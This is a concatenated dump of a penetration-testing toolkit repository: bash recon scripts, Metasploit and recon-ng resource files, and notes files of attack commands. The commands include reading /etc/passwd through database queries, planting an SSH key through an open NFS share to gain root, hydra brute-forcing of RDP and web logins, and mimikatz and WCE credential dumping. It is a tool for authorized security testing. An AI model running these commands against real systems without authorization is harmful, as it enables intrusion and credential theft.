 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "Netblocks"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "This returns a list of Class A owners and takes about 100 sec."
11 | echo
12 | 
13 | for x in `seq 1 255`; do
14 |      whois $x.0.0.0 | egrep '(CIDR|OrgName)' >> tmp
15 |      echo >> tmp
16 | done
17 | 
18 | egrep -v '(%|No address)' tmp > tmp2
19 | cat -s tmp2 > netblocks.txt
20 | 
21 | rm tmp*
22 | 
23 | echo
24 | echo
25 | 
26 | 


--------------------------------------------------------------------------------
/resource/printers.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 9100
 4 | 
 5 | use auxiliary/scanner/printer/printer_download_file
 6 | run
 7 | 
 8 | use auxiliary/scanner/printer/printer_env_vars
 9 | run
10 | 
11 | use auxiliary/scanner/printer/printer_list_dir
12 | run
13 | 
14 | use auxiliary/scanner/printer/printer_list_volumes
15 | run
16 | 
17 | use auxiliary/scanner/printer/printer_ready_message
18 | run
19 | 
20 | use auxiliary/scanner/printer/printer_version_info
21 | run
22 | 


--------------------------------------------------------------------------------
/resource/x11.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | 
 4 | use auxiliary/scanner/x11/open_x11
 5 | set RPORT 6000
 6 | run
 7 | 
 8 | use auxiliary/scanner/x11/open_x11
 9 | set RPORT 6001
10 | run
11 | 
12 | use auxiliary/scanner/x11/open_x11
13 | set RPORT 6002
14 | run
15 | 
16 | use auxiliary/scanner/x11/open_x11
17 | set RPORT 6003
18 | run
19 | 
20 | use auxiliary/scanner/x11/open_x11
21 | set RPORT 6004
22 | run
23 | 
24 | use auxiliary/scanner/x11/open_x11
25 | set RPORT 6005
26 | run
27 | 


--------------------------------------------------------------------------------
/misc/python/ex1.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os
 4 | import sys
 5 | 
 6 | os.system('clear')
 7 | port = raw_input('\nEnter a valid port: ')
 8 | 
 9 | if port == '':
10 |      print '\nYou did not enter anything.\n\n'
11 |      sys.exit(1)
12 | 
13 | try:
14 |      val = int(port)
15 | except ValueError:
16 |      print('\nThat is not an number.\n\n')
17 |      sys.exit(1)
18 | 
19 | if int(port) not in range(1,65535):
20 |      print '\nThat is an invalid port.\n\n'
21 | else:
22 |      print '\nThat is a valid port.\n\n'
23 | 
24 | 


--------------------------------------------------------------------------------
/resource/vmware.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 443
 4 | 
 5 | use auxiliary/scanner/vmware/esx_fingerprint
 6 | run
 7 | 
 8 | use auxiliary/scanner/vmware/vmware_enum_permissions
 9 | run
10 | 
11 | use auxiliary/scanner/vmware/vmware_enum_sessions
12 | run
13 | 
14 | use auxiliary/scanner/vmware/vmware_enum_users
15 | run
16 | 
17 | use auxiliary/scanner/vmware/vmware_enum_vms
18 | run
19 | 
20 | use auxiliary/scanner/vmware/vmware_host_details
21 | run
22 | 
23 | use auxiliary/scanner/vmware/vmware_screenshot_stealer
24 | run
25 | 


--------------------------------------------------------------------------------
/notes/databases.txt:
--------------------------------------------------------------------------------
 1 | Databases
 2 | 
 3 |  
 4 | # MySQL
 5 | 
 6 | mysql -h <IP> -u <username> -p <password>
 7 | show databases;
 8 | use <database name>
 9 | show tables;
10 | SELECT * FROM <table>
11 | SELECT LOAD_FILE('/etc/passwd')\g
12 | ------------------------------------------------------------------------------------------------------
13 | 
14 | # Postgresql
15 | 
16 | psql -h <IP> -U <username> -d <database> 
17 | -W <password>
18 | select username, passwd from pg_shadow;
19 | select current_database();
20 | create table test (input TEXT); copy test from '/etc/passwd'; select input from test;
21 | 
22 | 


--------------------------------------------------------------------------------
/notes/hack3rcon/open-list.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | echo
 5 | echo
 6 | echo -n "Enter location of list: "
 7 | read location
 8 | 
 9 | # Check for no response
10 | if [ -z $location ]; then
11 |      echo
12 |      echo "You did not enter a location."
13 |      exit
14 | fi
15 | 
16 | # Check for wrong location
17 | if [ ! -f $location ]; then
18 |      echo 
19 |      echo "The file does not exist."
20 |      exit
21 | fi
22 | 
23 | firefox &
24 | sleep 4
25 | 
26 | # Read a list and open each line in a new tab
27 | for i in $(cat $location); do
28 |      firefox -new-tab $i &
29 |      sleep 1
30 | done
31 | 


--------------------------------------------------------------------------------
/misc/dns-transfer.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "DNS Transfer"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Check for DNS zone transfer."
11 | echo
12 | echo "Usage: target.com"
13 | echo
14 | 
15 | read -p "Domain: " domain
16 | 
17 | if [ -z $domain ]; then
18 |      echo
19 |      echo "#########################"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      exit
24 | fi
25 | 
26 | echo
27 | echo "#########################"
28 | echo
29 | 
30 | for x in $(host -t ns $domain | cut -d ' ' -f4); do
31 |      host -l $domain $x
32 | done
33 | 
34 | echo
35 | echo
36 | 


--------------------------------------------------------------------------------
/notes/hack3rcon/main.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | echo
 5 | echo
 6 | echo "Welcome to Hack3rcon5."
 7 | echo "This is my master script."
 8 | echo
 9 | echo
10 | echo "1. Recon domain"
11 | echo "2. Recon people"
12 | echo "3. Open a list of URLs in Firefox"
13 | echo "4. Open a domain's robot.txt in Firefox"
14 | echo "5. Nmap"
15 | echo
16 | echo -n "Choice: "
17 | read choice
18 | 
19 | echo $choice
20 | 
21 | case $choice in
22 |      1) ./recon-domain.sh ;;
23 |      2) ./recon-people.sh ;;
24 |      3) ./open-list.sh ;;
25 |      4) ./robots.sh ;;
26 |      5) ./nmap.sh ;;
27 |      *) echo; echo "Invalid choice."; echo
28 | esac
29 | 


--------------------------------------------------------------------------------
/notes/hack3rcon/recon-domain.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | echo
 5 | echo
 6 | echo -n "Enter a domain: "
 7 | read domain
 8 | 
 9 | # Check for no response
10 | if [ -z $domain ]; then
11 |      echo
12 |      echo "You did not enter a domain."
13 |      exit
14 | fi
15 | 
16 | echo
17 | echo "Starting recon on $domain."
18 | echo
19 | read -p "Press <enter> to continue."
20 | 
21 | firefox &
22 | sleep 4
23 | firefox -new-tab http://www.intodns.com/$domain &
24 | sleep 1
25 | firefox -new-tab http://mxtoolbox.com/SuperTool.aspx?action=dns%3a$domain&run=toolpage &
26 | sleep 1
27 | firefox -new-tab http://viewdns.info/dnsreport/?domain=$domain &
28 | 


--------------------------------------------------------------------------------
/misc/ping-sweep.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "PIng Sweep"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Find live hosts in a Class C."
11 | echo
12 | echo "Usage: 192.168.1"
13 | echo
14 | 
15 | read -p "Class: " class
16 | 
17 | if [ -z $class ]; then
18 |      echo
19 |      echo "#########################"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      exit
24 | fi
25 | 
26 | echo
27 | echo "#########################"
28 | echo
29 | 
30 | for x in `seq 1 254`; do
31 |      ping -c 2 $class.$x | grep 'bytes from' | cut -d ' ' -f4 | cut -d ':' -f1 &
32 | done
33 | 
34 | echo
35 | echo
36 | 
37 | 


--------------------------------------------------------------------------------
/notes/unix.txt:
--------------------------------------------------------------------------------
 1 | Unix
 2 | 
 3 | 
 4 | # NFS Shares Anonymous Mountable
 5 | 
 6 | showmount -e <target IP>
 7 | 
 8 | mkdir /tmp/test
 9 | mount -t nfs -o nolock <target IP>:/share /tmp/test/
10 | cat /root/.ssh/id_rsa.pub >> /tmp/test/root/.ssh/authorized_keys
11 | umount /tmp/test
12 | ssh root@<target IP>
13 | ------------------------------------------------------------------------------------------------------
14 | 
15 | # Rstatd enabled
16 | 
17 | rsysinfo <target IP>
18 | ------------------------------------------------------------------------------------------------------
19 | 
20 | # Samba with a writeable file share
21 | 
22 | smbclient -L //<target IP>
23 | 
24 | 


--------------------------------------------------------------------------------
/misc/dns-reverse.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "DNS Reverse"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Perform a PTR DNS query on a Class C range and return FQDNs."
11 | echo
12 | echo "Usage: 192.168.1"
13 | echo
14 | 
15 | read -p "Class: " class
16 | 
17 | if [ -z $class ]; then
18 |      echo
19 |      echo "#########################"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      exit
24 | fi
25 | 
26 | echo
27 | echo "#########################"
28 | echo
29 | 
30 | for x in `seq 1 254`; do
31 |      host $class.$x | grep 'name pointer' | cut -d ' ' -f1,5
32 | done
33 | 
34 | echo
35 | echo
36 | 
37 | 


--------------------------------------------------------------------------------
/resource/smb.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 445
 4 | 
 5 | use auxiliary/scanner/smb/pipe_auditor
 6 | run
 7 | 
 8 | use auxiliary/scanner/smb/pipe_dcerpc_auditor
 9 | run
10 | 
11 | use auxiliary/scanner/smb/psexec_loggedin_users
12 | run
13 | 
14 | use auxiliary/scanner/smb/smb2
15 | run
16 | 
17 | use auxiliary/scanner/smb/smb_enumshares
18 | run
19 | 
20 | use auxiliary/scanner/smb/smb_enumusers_domain
21 | run
22 | 
23 | use auxiliary/scanner/smb/smb_enumusers
24 | run
25 | 
26 | use auxiliary/scanner/smb/smb_login
27 | run
28 | 
29 | use auxiliary/scanner/smb/smb_lookupsid
30 | run
31 | 
32 | use auxiliary/scanner/smb/smb_version
33 | run
34 | 


--------------------------------------------------------------------------------
/misc/dns-forward.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "DNS Forward"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Show IP addresses of subdomains."
11 | echo
12 | echo "Usage: target.com"
13 | echo
14 | 
15 | read -p "Domain: " domain
16 | 
17 | if [ -z $domain ]; then
18 |      echo
19 |      echo "#########################"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      exit
24 | fi
25 | 
26 | echo
27 | echo "#########################"
28 | echo
29 | 
30 | for x in $(cat /usr/share/dnsenum/dns.txt); do
31 |      host $x.$domain | grep 'has address' | cut -d ' ' -f1,4 >> tmp
32 | done
33 | 
34 | column -t tmp | sort -u
35 | 
36 | rm tmp
37 | 
38 | echo
39 | echo
40 | 
41 | 


--------------------------------------------------------------------------------
/notes/hack3rcon/robots.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | rm robots.txt tmp 2>/dev/null
 5 | 
 6 | echo
 7 | echo
 8 | echo -n "Enter a domain: "
 9 | read domain
10 | 
11 | # Check for no response
12 | if [ -z $domain ]; then
13 |      echo
14 |      echo "You did not enter a domain."
15 |      exit
16 | fi
17 | 
18 | wget -q $domain/robots.txt
19 | 
20 | # awk example
21 | cat robots.txt | grep 'Disallow' | awk '{print $2}' > tmp
22 | 
23 | # cut example
24 | #cat robots.txt | grep 'Disallow' | cut -d ' ' -f2 > tmp
25 | 
26 | firefox &
27 | sleep 4
28 | 
29 | # Read a list and open each line in a new tab
30 | for i in $(cat tmp); do
31 |      firefox -new-tab http://www.$domain$i &
32 |      sleep1
33 | done
34 | 
35 | rm robots.txt tmp
36 | 


--------------------------------------------------------------------------------
/notes/ssl.txt:
--------------------------------------------------------------------------------
 1 | SSL
 2 | 
 3 |  
 4 | Redirect
 5 | Examine the response of a 301 message or Javascript.
 6 | curl -vvvv http://target.com
 7 | ------------------------------------------------------------------------------------------------------
 8 | 
 9 | Renegotiating (NULL-SHA or NULL-MD5)
10 | 
11 | sslscan --no-failed <target IP>
12 | 
13 | sslscan --targets=443.txt --no-failed
14 | 
15 | openssl s_client -connect target:443
16 | 
17 | telnet <target IP> 443
18 | GET / HTTP/1.0
19 | R
20 | ------------------------------------------------------------------------------------------------------
21 | 
22 | paste 443.txt | while read IP port; do echo "----START "$IP":"$port"----"; echo -e "HEAD / HTTP/1.0\nR\n\n" | ncat --ssl "$IP" "$port"; echo -e "\$
23 | 
24 | 


--------------------------------------------------------------------------------
/resource/snmp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 161
 4 | 
 5 | use auxiliary/scanner/misc/oki_scanner
 6 | run
 7 | 
 8 | use auxiliary/scanner/snmp/aix_version
 9 | run
10 | 
11 | use auxiliary/scanner/snmp/brocade_enumhash
12 | run
13 | 
14 | use auxiliary/scanner/snmp/cisco_config_tftp
15 | run
16 | 
17 | use auxiliary/scanner/snmp/cisco_upload_file
18 | echo 'Hello world!' > /tmp/test.txt
19 | set SOURCE /tmp/test.txt
20 | run
21 | 
22 | use auxiliary/scanner/snmp/netopia_enum
23 | run
24 | 
25 | use auxiliary/scanner/snmp/snmp_enum
26 | run
27 | 
28 | use auxiliary/scanner/snmp/snmp_enumshares
29 | run
30 | 
31 | use auxiliary/scanner/snmp/snmp_enumusers
32 | run
33 | 
34 | use auxiliary/scanner/snmp/ubee_ddw3611
35 | run
36 | 
37 | use auxiliary/scanner/snmp/xerox_workcentre_enumusers
38 | run
39 | 


--------------------------------------------------------------------------------
/misc/crawl.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo "Crawl"
 6 | echo
 7 | echo
 8 | echo "By Lee Baird"
 9 | echo
10 | echo "Returns a list of IP external web servers that are linked from home page."
11 | echo
12 | echo "Usage: target.com"
13 | echo
14 | 
15 | read -p "Domain: " domain
16 | 
17 | if [ -z $domain ]; then
18 |      echo
19 |      echo "#########################"
20 |      echo
21 |      echo "Invalid choice."
22 |      echo
23 |      exit
24 | fi
25 | 
26 | echo
27 | echo "#########################"
28 | echo
29 | 
30 | wget -q www.$domain
31 | 
32 | grep 'href=' index.html | cut -d '/' -f3 | grep $domain | cut -d '"' -f1 | sort -u > tmp
33 | 
34 | for x in $(cat tmp); do
35 |      host $x | grep 'has address' | cut -d ' ' -f1,4 >> tmp2
36 | done
37 | 
38 | column -t tmp2 | sort -u
39 | 
40 | rm index.html tmp*
41 | 
42 | echo
43 | echo
44 | 
45 | 


--------------------------------------------------------------------------------
/notes/hack3rcon/recon-people.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | echo
 5 | echo
 6 | echo -n "First name: "
 7 | read fname
 8 | 
 9 | # Check for no response
10 | if [ -z $fname ]; then
11 |      echo
12 |      echo "You did not enter a first name."
13 |      exit
14 | fi
15 | 
16 | echo
17 | echo -n "Last name: "
18 | read lname
19 | 
20 | # Check for no response
21 | if [ -z $lname ]; then
22 |      echo
23 |      echo "You did not enter a last name."
24 |      exit
25 | fi
26 | 
27 | echo
28 | echo "Starting recon on $fname $lname."
29 | echo
30 | read -p "Press <enter> to continue."
31 | 
32 | firefox &
33 | sleep 4
34 | firefox -new-tab http://www.411.com/name/$fname-$lname/ &
35 | sleep 1
36 | firefox -new-tab http://www.cvgadget.com/person/$fname/$lname &
37 | sleep 1
38 | firefox -new-tab https://pipl.com/search/?q=$fname+$lname &
39 | sleep 1
40 | firefox -new-tab http://www.zabasearch.com/people/$fname+$lname/ &
41 | 


--------------------------------------------------------------------------------
/misc/python/test.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | f = open('tmp','r')                                # Setup a read connection to file
 4 | filedata = f.read()                                # Read the file
 5 | f.close()                                          # Close the connection
 6 | filedata = filedata.split('\n')                    # Turn into a list
 7 | 
 8 | ##############################
 9 | 
10 | out = []                                           # Create an empty array
11 | 
12 | for i in filedata:
13 |      if '@' in i:                                  # grep '@'
14 |           if not 'apples' in i:                    # grep -v 'apples'
15 |                out.append(i.lower())               # Append to array and change to lower case
16 | 
17 | out = list(set(out))                               # Make list unique
18 | out.sort()                                         # Sort
19 | 
20 | for j in out:
21 |      print j
22 | 
23 | 


--------------------------------------------------------------------------------
/notes/exploits.txt:
--------------------------------------------------------------------------------
 1 | Exploits
 2 | 
 3 | 
 4 | cd /usr/share/exploitdb/
 5 | searchsploit <term1> <term2> <term3>
 6 | searchsploit sshd remote 1.2
 7 | 
 8 | Choose your exploit and copy it to a working location.
 9 | cp platforms/windows/remote/5751.pl /root/exploit.pl
10 | ------------------------------------------------------------------------------------------------------
11 | 
12 | # Headers
13 | 
14 | Some exploits may be written for compilation under Windows, while others for Linux.
15 | You can identify the environment by inspecting the headers.
16 | 
17 | Linux - arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
18 | 
19 | Windows - process.h, string.h, winbase.h, windows.h, winsock2.h
20 | ------------------------------------------------------------------------------------------------------
21 | 
22 | # Grep out Windows headers, to leave only Linux based exploits.
23 | 
24 | cat sploitlist.txt | grep -i 'exploit' | cut -d ' ' -f1 | xargs grep 'sys' | cut -d ':' -f1 | sort -u
25 | 
26 | 


--------------------------------------------------------------------------------
/notes/snmp.txt:
--------------------------------------------------------------------------------
 1 | SNMP
 2 | 
 3 | 
 4 | # Default or Guessable SNMP Community Strings
 5 | 
 6 | onesixtyone -c <password list> -i <target list>
 7 | 
 8 | snmpcheck.pl -t <target IP> <private/public>
 9 | ------------------------------------------------------------------------------------------------------
10 | 
11 | # Read-only Community String of 'public'
12 | 
13 | snmpwalk -c public -v1 <target IP>                            # Enumerating MIB tree
14 |                                                               # MS Windows parameters
15 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.25.1.6.0       # System processes
16 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.25.4.2.1.2     # Running processes
17 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.25.4.2.1.4     # Processes path
18 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.25.2.3.1.4     # Storage units
19 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.25.6.3.1.2     # Software name
20 | snmpwalk -c public -v1 <target IP> 1.3.6.1.4.1.77.1.2.25      # User accounts
21 | snmpwalk -c public -v1 <target IP> 1.3.6.1.2.1.6.13.1.3       # TCP local port
22 | 
23 | 


--------------------------------------------------------------------------------
/utfdictcsv.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import csv
 4 | import cStringIO
 5 | import codecs
 6 | 
 7 | class DictUnicodeWriter(object):
 8 | 
 9 |     def __init__(self, f, fieldnames, dialect=csv.excel, encoding="utf-8", **kwds):
10 |         # Redirect output to a queue
11 |         self.queue = cStringIO.StringIO()
12 |         self.writer = csv.DictWriter(self.queue, fieldnames, dialect=dialect, **kwds)
13 |         self.stream = f
14 |         self.encoder = codecs.getincrementalencoder(encoding)()
15 | 
16 |     def writerow(self, D):
17 |         self.writer.writerow({k:v.encode("utf-8") for k, v in D.items()})
18 |         # Fetch UTF-8 output from the queue ...
19 |         data = self.queue.getvalue()
20 |         data = data.decode("utf-8")
21 |         # ... and reencode it into the target encoding
22 |         data = self.encoder.encode(data)
23 |         # write to the target stream
24 |         self.stream.write(data)
25 |         # empty queue
26 |         self.queue.truncate(0)
27 | 
28 |     def writerows(self, rows):
29 |         for D in rows:
30 |             self.writerow(D)
31 | 
32 |     def writeheader(self):
33 |         self.writer.writeheader()


--------------------------------------------------------------------------------
/misc/python/ex2.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os
 4 | from xml.dom.minidom import parse
 5 | import xml.dom.minidom
 6 | 
 7 | os.system('clear')
 8 | 
 9 | # Open XML document using minidom parser
10 | DOMTree = xml.dom.minidom.parse('movies.xml')
11 | collection = DOMTree.documentElement
12 | if collection.hasAttribute('shelf'):
13 |      print '\n\nRoot element: %s\n' % collection.getAttribute('shelf')
14 | 
15 | # Get all the movies in the collection
16 | movies = collection.getElementsByTagName('movie')
17 | 
18 | # Print details of each movie.
19 | for movie in movies:
20 |      print '***** Movie *****'
21 |      if movie.hasAttribute('title'):
22 |           print 'Title: %s' % movie.getAttribute('title')
23 | 
24 |      type = movie.getElementsByTagName('type')[0]
25 |      print 'Type: %s' % type.childNodes[0].data
26 |      format = movie.getElementsByTagName('format')[0]
27 |      print 'Format: %s' % format.childNodes[0].data
28 |      rating = movie.getElementsByTagName('rating')[0]
29 |      print 'Rating: %s' % rating.childNodes[0].data
30 |      description = movie.getElementsByTagName('description')[0]
31 |      print 'Description: %s' % description.childNodes[0].data
32 | 
33 | 


--------------------------------------------------------------------------------
/alias:
--------------------------------------------------------------------------------
 1 | # To enable these aliases or when you modify this file:
 2 | # cp /opt/discover/alias /root/.bash_aliases ; source /root/.bash_aliases
 3 | 
 4 | dns=$(grep 'nameserver' /etc/resolv.conf | awk '{print $2}')
 5 | interface=$(ifconfig | grep -B1 'inet addr' | egrep -v '(-|inet addr|Loopback)' | cut -d ' ' -f1)
 6 | ip=$(ifconfig | grep 'Bcast' | awk '{print$2}' | cut -d ':' -f2)
 7 | mac=$(ifconfig | grep -B1 'inet addr' | egrep -v '(-|inet addr|Loopback)' | awk '{print$5}')
 8 | 
 9 | alias c='clear'
10 | alias cl='clear ; ls -l'
11 | alias d='cd /root/Desktop/ ; clear'
12 | alias e='exit'
13 | alias i='echo ; echo ; echo "DNS      " $dns ; echo ; ifconfig ; ping google.com -c3 ; echo ; echo'
14 | alias l='ls -l'
15 | alias n='echo ; netstat -antup | egrep -v "Active" ; echo ;
16 | echo -n "Interface:    "$interface ; echo ;
17 | echo -n "MAC address:  "$mac ; echo ;
18 | echo -n "Internal IP:  "$ip ; echo ;
19 | echo -n "External IP:  " ; curl ifconfig.me ; echo'
20 | alias r='cd /root/ ; clear'
21 | alias s='cd /opt/discover/ ; clear'
22 | 
23 | alias nexpose='service postgresql stop ; cd /opt/rapid7/nexpose/nsc ; ./nsc.sh'
24 | 
25 | alias sip='sort -V'
26 | 
27 | alias update='/opt/discover/update.sh'
28 | 


--------------------------------------------------------------------------------
/notes/hack3rcon/nmap.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | echo
 5 | echo
 6 | echo "1. CIDR, IP or URL"
 7 | echo "2. List"
 8 | echo "3. Previous menu"
 9 | echo
10 | echo -n "Choice: "
11 | read choice
12 | 
13 | case $choice in
14 |      1)
15 |      echo
16 |      echo -n "Enter a CIDR, IP or URL: "
17 |      read target
18 | 
19 |      # Check for no response
20 |      if [ -z $target ]; then
21 |           echo
22 |           echo "You did not enter anything."
23 |           exit
24 |      fi
25 | 
26 |      nmap -Pn -n -T4 --open -sV --stats-every 10s $target -oN scan.txt
27 |      ;;
28 | 
29 |      2)
30 |      echo
31 |      echo -n "Enter the location of your list: "
32 |      read location
33 | 
34 |      # Check for no response
35 |      if [ -z $location ]; then
36 |           echo
37 |           echo "You did not enter a location."
38 |           exit
39 |      fi
40 | 
41 |      # Check for wrong location
42 |      if [ ! -f $location ]; then
43 |           echo
44 |           echo "The file does not exist."
45 |           exit
46 |      fi
47 | 
48 |      nmap -Pn -n -T4 --open -sV --stats-every 10s -iL $location -oN scan.txt
49 |      ;;
50 | 
51 |      3) ./main.sh ;;
52 | 
53 |      *) echo; echo "Invalid choice."; echo
54 | esac
55 | 


--------------------------------------------------------------------------------
/notes/insecure-protocols.txt:
--------------------------------------------------------------------------------
 1 | Insecure Protocols
 2 | 
 3 | 
 4 | # FTP access with admin/null credentials
 5 | 
 6 | ftp admin@<target IP>
 7 | user
 8 | admin
 9 | pwd
10 | 
11 | telnet <target IP> 21
12 | user admin
13 | pass
14 | id;
15 | ------------------------------------------------------------------------------------------------------
16 | 
17 | # FTP on non-standard port
18 | 
19 | ftp <target IP> <port>
20 | ------------------------------------------------------------------------------------------------------
21 | 
22 | # FTP server does not support AUTH command
23 | 
24 | telnet <target IP> 21
25 | AUTH test
26 | ------------------------------------------------------------------------------------------------------
27 | 
28 | # Rservices
29 | 
30 | 513/tcp
31 | apt-get install rsh-client
32 | rlogin -l root <target IP>
33 | ------------------------------------------------------------------------------------------------------
34 | 
35 | # SSH Protocol v1
36 | 
37 | nmap -Pn -n -T4 -p22 --script=sshv1 <target IP>
38 | 
39 | ssh -1 <target IP>
40 | ------------------------------------------------------------------------------------------------------
41 | 
42 | # X11
43 | 
44 | nmap -Pn -n -T4 -p6000 --script=x11-access <target IP>
45 | 
46 | xspy <target IP>
47 | 
48 | 


--------------------------------------------------------------------------------
/resource/recon-ng/passive.rc:
--------------------------------------------------------------------------------
 1 | workspaces add yyy
 2 | add companies
 3 | xxx
 4 | none
 5 | add domains
 6 | yyy
 7 | 
 8 | use recon/domains-hosts/baidu_site
 9 | run
10 | 
11 | use recon/domains-hosts/bing_domain_api
12 | run
13 | 
14 | use recon/domains-hosts/bing_domain_web
15 | run
16 | 
17 | use recon/domains-hosts/google_site_api
18 | run
19 | 
20 | use recon/domains-hosts/google_site_web
21 | run
22 | 
23 | use recon/domains-hosts/netcraft
24 | run
25 | 
26 | use recon/domains-hosts/shodan_hostname
27 | run
28 | 
29 | use recon/domains-hosts/yahoo_site
30 | run
31 | 
32 | use recon/domains-vulnerabilities/punkspider
33 | run
34 | 
35 | use recon/domains-vulnerabilities/xssed
36 | run
37 | 
38 | use recon/hosts-hosts/bing_ip
39 | run
40 | 
41 | use recon/hosts-hosts/ip_neighbor
42 | run
43 | 
44 | use recon/hosts-hosts/ipinfodb
45 | run
46 | 
47 | use recon/hosts-hosts/resolve
48 | run
49 | 
50 | use recon/domains-contacts/builtwith
51 | run
52 | 
53 | use recon/domains-contacts/pgp_search
54 | run
55 | 
56 | use recon/domains-contacts/whois_pocs
57 | run
58 | 
59 | use recon/companies-contacts/facebook
60 | run
61 | 
62 | use recon/contacts-contacts/rapportive
63 | run
64 | 
65 | use recon/contacts-creds/haveibeenpwned
66 | run
67 | 
68 | use recon/contacts-creds/pwnedlist
69 | run
70 | 
71 | use recon/contacts-creds/should_change_password
72 | run
73 | 


--------------------------------------------------------------------------------
/notes/dns.txt:
--------------------------------------------------------------------------------
 1 | DNS
 2 | 
 3 | 
 4 | # General
 5 | 
 6 | dig target.com <type>                    # a, mx, ns, soa, srv, txt, any
 7 | dig -x <target IP>                       # Pointer records
 8 | dig @nameserverIP target.com axfr        # Zone transfer
 9 | dig @nameserverIP target.com afro        # Forward zone transfer
10 | 
11 | host -t ns target.com                    # Show name servers 
12 | host -t mx target.com                    # Show mail servers
13 | host www.target.com
14 | host -l target.com <nameserver>          # Zone transfer
15 | ------------------------------------------------------------------------------------------------------
16 |  
17 | # Cache snooping
18 | 
19 | host -r www.google.com <nameserver IP>
20 | ------------------------------------------------------------------------------------------------------
21 | 
22 | # DNS cache poisioning
23 | 
24 | for i in `53.txt`; do dig @"$i" +short porttest.dns-oarc.net TXT; done; > CachePoison.txt
25 | ------------------------------------------------------------------------------------------------------
26 | 
27 | # Non-recursive DNS queries
28 | 
29 | for i in `cat 53.txt`; do dig @"$i" www.google.com A +norecurse; done > NonRecurive.txt
30 | ------------------------------------------------------------------------------------------------------
31 | 
32 | # Open DNS resolution against a DNS server.
33 | 
34 | Supply a hostname not cached or inside a company owned domain.
35 | nslookup www.nsa.gov <nameserver IP>
36 | ------------------------------------------------------------------------------------------------------
37 | 
38 | # Spoofed request amplification DDoS
39 | 
40 | for i in `cat 53.txt`; do dig @"$i" . NS; done > AmpDDoS.txt
41 | 
42 | 


--------------------------------------------------------------------------------
/notes/passwords.txt:
--------------------------------------------------------------------------------
 1 | Passwords
 2 | 
 3 | 
 4 | # Cracking
 5 | john -w=/usr/share/wordlists/rockyou.txt --format=<format> <hashes>
 6 | 
 7 | hashcat -m 5600 -a 1 <hashes>  -r /usr/share/hashcat/rules/combinator.rule
 8 | 
 9 | hydra -L <username list> -P <password list> -M <target list> <protocol>
10 | hydra -l <username> -p <password> <target> <protocol>
11 | hydra -l root -P /usr/share/wordlists/rockyou.txt -M 3389.txt rdp
12 | 
13 | hydra -l administrator -p admin -M /root/Desktop/target.txt http-form-post "/teamquest/cgi-bin/login:username=^USER^&pass=^PASS^:S=302 Found" -s 2780
14 | hydra -l administrator -p admin 10.0.0.10 http-form-post "/teamquest/cgi-bin/login:username=^USER^&pass=^PASS^:S=302 Found" -s 2780
15 | ------------------------------------------------------------------------------------------------------
16 | 
17 | # Dump Hashes
18 | 
19 | fgdump, pwdump6, pwdump7, smbexec, wce
20 | 
21 | mimikatz
22 | priviledge::debug
23 | sekurlsa::logonpasswords
24 | ------------------------------------------------------------------------------------------------------
25 | 
26 | # Sniffing
27 | 
28 | responder -i <IP> -r On -w On
29 | ------------------------------------------------------------------------------------------------------
30 | 
31 | # Windows Credential Editor (WCE)
32 | 
33 | How do I change my current NTLM credentials?
34 | wce.exe -s <username>:<domain>:<lmhash>:<nthash>
35 | 
36 | How do I create a new logon session and launch a program with new NTLM credentials?
37 | wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
38 | 
39 | How can I generate NTLM hashes with WCE? (for testing purposes)
40 | wce.exe -g <cleartext password>
41 | 
42 | How can I write hashes obtained by WCE to a file?
43 | wce.exe -o hashes.txt
44 | 


--------------------------------------------------------------------------------
/notes/maltego.txt:
